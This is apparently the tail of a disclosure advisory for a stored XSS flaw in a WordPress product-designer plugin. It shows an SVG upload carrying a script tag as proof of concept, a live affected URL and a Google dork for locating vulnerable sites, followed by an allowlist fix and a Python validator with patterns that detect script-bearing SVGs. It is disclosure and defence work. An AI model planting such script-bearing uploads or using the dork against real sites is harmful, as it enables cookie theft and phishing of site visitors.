<path d="M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z"/>
<path d="M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111
-83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7
-53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15
-9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0
-54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74
c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0
18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9
-28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z"/>
<path d="M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10
-5 -10 -11z"/>
<path d="M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85
0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11
0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3
-23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34
19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50
c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19
-10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16
-5 6 5 36 12 36 2 0 2 -9 -1 -20z"/>
<path d="M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z"/>
<path d="M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111
-83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6
-14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8
15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0
65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15
-38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11
-10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z"/>
<path d="M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114
-25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7
2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10
6 0 10 -4 10 -10z"/>
<path d="M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3
-46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23
l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21
-6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z
m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z
m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4
-19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z
m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15
35 19 35 5 0 5 -10 1 -22z"/>
<path d="M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59
75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5
63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100
-1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1
-12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z"/>
<path d="M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85
0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6
-19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z
m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2
26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33
3 57 11 57 1 0 1 -21 1 -48z"/>
<path d="M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39
10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z"/>
<path d="M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6
-15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0
5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27
18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8
3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1
-2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27
-32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z"/>
<path d="M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0
-4 -4 -4 -10z"/>
<path d="M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46
-7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3
-74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z"/>
<path d="M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13
-2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44
19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30
-4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z"/>
<path d="M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29
62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29
-22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z"/>
<path d="M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32
-4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3
-11 -27 -12 -89z"/>
<path d="M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77
8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55
10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z"/>
<path d="M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83
26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30
72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z"/>
<path d="M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106
8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0
-100 -4 -100 -10z"/>
<path d="M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/>
<path d="M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56
-62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27
43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8
-6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z"/>
<path d="M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15
-16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27
-21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25
-2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46
-68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6
4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3
8 -1 15 4 15 6 0 10 -7 10 -15z"/>
<path d="M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64
-36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36
52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24
-48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8
-63 -25z"/>
<path d="M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0
30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39
24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60
c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24
-22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z"/>
<path d="M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24
44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30
-110 44 -157 18z"/>
<path d="M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39
64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102
l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6
11 13 20 16 20 2 0 0 -9 -6 -20z"/>
<path d="M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27
-17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46
-40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63
c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z
m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3
-8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37
-38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0
93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110
-35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z
m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z"/>
<path d="M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z"/>
</g>
<script type="text/javascript">
alert("@insecurity");
</script>
</svg>

-------------------------------------------------------------------------------------------------------------

Here is a live example:
https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg

This could have a variety of impacts, ranging from cookie theft and the usual XSS-related risks to a highly
effective spear phishing campaign.

Google Dork: inurl:fancy_products_uploads

-------------------------------------------------------------------------------------------------------------

How to fix: Use a whitelist for file uploads (e.g. only allow JPG and PNG, no .svg)
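As an added example (not the plugin's or the advisory's code), the following Python shows the whitelist check the fix describes, extended with magic-byte verification so that an SVG renamed to .png is also rejected, plus a triage helper for SVG files already sitting in an uploads directory. The file names and contents in SAMPLE_UPLOADS are constructed for the example.

```python
"""Allowlist-based image upload validation and SVG triage (added example)."""
import re

# Allowlist of accepted raster types: extension -> (MIME type, magic-byte prefixes).
# SVG is deliberately absent: it is XML and can carry <script> and event handlers.
ALLOWED_TYPES = {
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

# Markers that turn an SVG from a picture into a script host. Used to triage
# files that were uploaded before the allowlist was enforced.
ACTIVE_MARKERS = {
    "script-element": re.compile(rb"<script\b", re.IGNORECASE),
    "event-handler": re.compile(rb"\son[a-z]+\s*=", re.IGNORECASE),
    "javascript-url": re.compile(rb"href\s*=\s*[\"']?\s*javascript:", re.IGNORECASE),
    "foreignobject": re.compile(rb"<foreignObject\b", re.IGNORECASE),
}


def validate_image_upload(filename, declared_mime, data):
    """Return (accepted, reason). Extension, declared type and real content must all agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'!r} is not allowlisted"
    expected_mime, magics = ALLOWED_TYPES[ext]
    if declared_mime.lower() != expected_mime:
        return False, f"declared type {declared_mime!r} does not match .{ext}"
    # The browser-supplied name and type are attacker-controlled; the bytes are not.
    if not data.startswith(magics):
        return False, f"file content is not {expected_mime}"
    return True, "ok"


def svg_findings(data):
    """Return the names of active-content markers found in an SVG ([] if clean or not SVG)."""
    if not re.search(rb"<svg\b", data, re.IGNORECASE):
        return []
    return [name for name, pattern in ACTIVE_MARKERS.items() if pattern.search(data)]


def triage_uploads(files):
    """files: mapping path -> bytes. Returns {path: findings} for SVGs carrying active content."""
    report = {}
    for path, data in files.items():
        findings = svg_findings(data)
        if findings:
            report[path] = findings
    return report


# Constructed sample uploads (not real files from the site in the advisory).
SAMPLE_UPLOADS = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "logo.svg": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>',
    "insecurity.svg": (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
                       b'<script type="text/javascript">alert("xss");</script></svg>'),
    # An SVG renamed to .png: passes an extension-only check, fails the magic-byte check.
    "disguised.png": b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>',
}

if __name__ == "__main__":
    for name, data in SAMPLE_UPLOADS.items():
        mime = "image/svg+xml" if name.endswith(".svg") else ALLOWED_TYPES[name.rsplit(".", 1)[-1]][0]
        print(name, validate_image_upload(name, mime, data))
    print("triage:", triage_uploads(SAMPLE_UPLOADS))
```

The allowlist rejects `insecurity.svg` on extension alone, and `disguised.png` on content, which is the check an extension-only filter misses. The triage helper only flags SVGs that actually carry script-capable markup, so a plain vector logo is not reported.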

There are also multiple full path disclosures in this plugin, but WP is riddled with FPD. If you're interested then
get in touch (although I'm pretty sure there are tons of files in /wp-includes/ that will give you FPD anyway, presuming error_reporting(0) is not set).


[+]---------------------------------------------------------[+]
| CONTACT US: |
| |
| IRC: irc.insecurity.zone (6667/6697) #insecurity |
| Twitter: @insecurity |
| Website: insecurity.zone |
[+]---------------------------------------------------------[+]
